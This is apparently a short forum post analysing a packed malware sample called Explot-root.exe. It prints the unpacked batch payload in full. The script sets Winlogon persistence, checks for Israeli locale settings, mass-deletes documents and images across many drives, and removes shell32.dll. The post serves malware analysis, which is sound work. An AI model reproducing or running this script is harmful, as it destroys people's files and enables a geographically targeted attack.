Explot-root.exe - malware.
Packed with two packers: UPX and Morphine.
Unpacked file contains .bat file which I think explains everything:
Код:
@echo off..title....reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %systemroot%\system32\userinit.exe,%systemroot%\system32\taskfile.exe /f....reg query "HKCU\Keyboard Layout\Preload" >>"%systemdrive%\svi\003988274\svss.lpd"..reg query "HKCU\Control Panel\International" >>"%systemdrive%\svi\003988274\svss.lpd"..find /I "0000040d" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit..find /I "Israel" "%systemdrive%\svi\003988274\svss.lpd"..if %errorlevel%==1 exit....del /f /s C:\*.jpg C:\*.txt C:\*.doc C:\*.htm..del /f /s d:\*.jpgd:\*.txt d:\*.doc C:\*.htm..del/f /s e:\*.jpg e:\*.txt e:\*.doc C:\*.htm..del /f /s f:\*.jpg f:\*.txt f:\*.doc C:\*.htm..del /f /s g:\*.jpg g:\*.txt g:\*.doc C:\*.htm..del /f /s h:\*.jpg h:\*.txt h:\*.doc C:\*.htm..del /f /s I:\*.jpg I:\*.txt I:\*.doc C:\*.htm..del /f /s J:\*.jpg J:\*.txt J:\*.doc C:\*.htm....del /f %systemroot%\system32\shell32.dll..del /f %systemdrive%\svi*...